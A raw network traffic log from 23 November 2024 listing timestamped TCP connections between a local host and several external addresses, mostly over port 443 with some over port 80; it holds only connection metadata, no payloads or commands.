Nov 23, 2024 07:09:32.774895906 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.774915934 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.774936914 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.775012970 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.783258915 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.783277988 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.783448935 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.783448935 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.783469915 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.783776045 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.793277025 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.793294907 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.793335915 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.793355942 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.793371916 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.793632030 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.800524950 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.800543070 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.800600052 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.800612926 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.800683022 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.808917046 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.808933973 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.808973074 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.808989048 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.809010983 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.809026003 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.886800051 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.886826038 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.886848927 CET	49795	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:32.886856079 CET	443	49795	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:32.958518982 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.958548069 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.958625078 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.958648920 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.958669901 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.958683968 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.965162992 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.965186119 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.965245008 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.965262890 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.965280056 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.969312906 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.971990108 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.972012043 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.972065926 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.972084045 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.972100973 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.973221064 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.978108883 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.978126049 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.978190899 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.978209019 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.978247881 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.984611034 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.984628916 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.984671116 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.984688044 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.984709024 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.984740973 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.991110086 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.991132021 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.991211891 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.991231918 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.991281986 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.997766018 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.997791052 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.997900963 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:32.997934103 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:32.998006105 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.004538059 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.004554987 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.004596949 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.004610062 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.004640102 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.004663944 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.168840885 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.168872118 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.168951988 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.168972969 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.169008017 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.169033051 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.174714088 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.174732924 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.174786091 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.174794912 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.174843073 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.181052923 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.181072950 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.181169033 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.181185961 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.181235075 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.186151028 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.186228991 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.395324945 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.397227049 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:33.823340893 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:33.823421955 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:34.031182051 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.031212091 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.031302929 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.123593092 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.123646975 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.123730898 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.184864998 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.184891939 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.209153891 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.209176064 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.235805988 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.235858917 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.235925913 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.258035898 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.258069038 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.258143902 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.268990040 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.269010067 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.306307077 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.306344986 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.306411982 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.307791948 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.307812929 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.326489925 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:34.326514959 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:34.655349970 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:34.655405998 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:34.709131002 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:34.709131002 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:34.787933111 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:34.787983894 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:34.788106918 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:34.809247017 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:34.809269905 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:34.828691959 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:34.828728914 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:34.828828096 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:34.828856945 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:34.828891993 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.344497919 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.344544888 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.344640017 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:35.348640919 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.350244999 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.350294113 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.350313902 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:35.358741045 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.358795881 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:35.358831882 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.367352009 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.367408037 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.367441893 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:35.375679970 CET	443	49704	20.190.147.12	192.168.2.6
Nov 23, 2024 07:09:35.375747919 CET	49704	443	192.168.2.6	20.190.147.12
Nov 23, 2024 07:09:36.023336887 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.024636984 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.034517050 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.034538031 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.034979105 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.034996033 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.043739080 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.043745995 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.044018984 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.044025898 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.066495895 CET	80	49778	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:36.066555023 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:36.145251036 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.161839008 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.168055058 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.168081999 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.168628931 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.168636084 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.175489902 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.175508022 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.187616110 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.187623978 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.278701067 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.319380045 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:36.323087931 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:36.437108040 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.466960907 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.467020988 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.467113018 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.479408979 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.479500055 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.479583025 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.589970112 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.590045929 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.590120077 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.604099035 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.604144096 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.604752064 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.604764938 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.604917049 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.604934931 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.604948997 CET	49803	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.604959011 CET	443	49803	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.605978012 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.606062889 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.606134892 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.606302023 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.606318951 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.606329918 CET	49800	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.606336117 CET	443	49800	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.619589090 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.619607925 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.619618893 CET	49798	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.619626045 CET	443	49798	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.619668961 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.619668961 CET	49799	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.619692087 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.619704008 CET	443	49799	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.623668909 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:36.629317999 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:36.629339933 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:36.630932093 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:36.631026030 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:36.666141987 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:36.666352987 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:36.666455030 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:36.703526020 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.703555107 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.703623056 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.705404997 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.705485106 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.705545902 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.709983110 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.709996939 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.710220098 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.710249901 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.710345030 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.710535049 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.710551977 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.710993052 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.711045027 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.713958025 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.713969946 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.714039087 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.714215994 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.714232922 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.739166021 CET	49778	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:36.739480019 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:36.786818027 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:36.786853075 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:36.858714104 CET	80	49778	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:36.858973980 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:36.859050989 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:36.873600960 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:36.873641968 CET	49817	80	192.168.2.6	185.215.113.206
Nov 23, 2024 07:09:36.917637110 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:36.938766956 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.938832045 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.938883066 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.961335897 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.961350918 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.961364031 CET	49804	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.961369991 CET	443	49804	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.968919039 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.968945980 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.969003916 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.969631910 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:36.969644070 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:36.993199110 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:36.993262053 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:36.993297100 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:36.993381023 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:37.131716013 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:37.131947041 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:37.132044077 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:37.134422064 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:37.134475946 CET	443	49809	94.245.104.56	192.168.2.6
Nov 23, 2024 07:09:37.134505033 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:37.134547949 CET	49809	443	192.168.2.6	94.245.104.56
Nov 23, 2024 07:09:37.490531921 CET	49824	443	192.168.2.6	2.16.158.75
Nov 23, 2024 07:09:37.490617037 CET	443	49824	2.16.158.75	192.168.2.6
Nov 23, 2024 07:09:37.490690947 CET	49824	443	192.168.2.6	2.16.158.75
Nov 23, 2024 07:09:37.490880966 CET	49824	443	192.168.2.6	2.16.158.75
Nov 23, 2024 07:09:37.490914106 CET	443	49824	2.16.158.75	192.168.2.6
Nov 23, 2024 07:09:37.752217054 CET	49825	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:37.752260923 CET	443	49825	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:37.752362967 CET	49825	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:37.752589941 CET	49825	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:37.752604961 CET	443	49825	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:38.207292080 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.207323074 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207334995 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207410097 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.207417965 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207428932 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207505941 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.207510948 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207521915 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207532883 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207583904 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.207590103 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.207648993 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.207675934 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.208540916 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.208651066 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.209429026 CET	49791	443	192.168.2.6	150.171.27.10
Nov 23, 2024 07:09:38.209439039 CET	443	49791	150.171.27.10	192.168.2.6
Nov 23, 2024 07:09:38.354558945 CET	49825	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:38.355345011 CET	49824	443	192.168.2.6	2.16.158.75
Nov 23, 2024 07:09:38.355577946 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:38.355602980 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:38.355798960 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:38.358207941 CET	49830	443	192.168.2.6	142.250.181.97
Nov 23, 2024 07:09:38.358223915 CET	443	49830	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:38.395350933 CET	443	49825	142.250.181.97	192.168.2.6
Nov 23, 2024 07:09:38.399334908 CET	443	49824	2.16.158.75	192.168.2.6
Nov 23, 2024 07:09:38.513597965 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.515729904 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.518754005 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.518785954 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.518925905 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.525294065 CET	49811	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.525301933 CET	443	49811	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.525944948 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.526042938 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.526067019 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.526535988 CET	49813	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.526540995 CET	443	49813	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.536322117 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.536339998 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.537313938 CET	49815	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.537318945 CET	443	49815	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.544612885 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.544704914 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.544969082 CET	49812	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.544985056 CET	443	49812	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.766194105 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:38.766211033 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:38.766535997 CET	443	49797	150.171.28.10	192.168.2.6
Nov 23, 2024 07:09:38.766592979 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:38.766997099 CET	49797	443	192.168.2.6	150.171.28.10
Nov 23, 2024 07:09:38.768410921 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.769028902 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.769068003 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.777087927 CET	49821	443	192.168.2.6	13.107.246.63
Nov 23, 2024 07:09:38.777096033 CET	443	49821	13.107.246.63	192.168.2.6
Nov 23, 2024 07:09:38.782608032 CET	80	49817	185.215.113.206	192.168.2.6
Nov 23, 2024 07:09:38.782669067 CET	49817	80	192.168.2.6	185.215.113.206
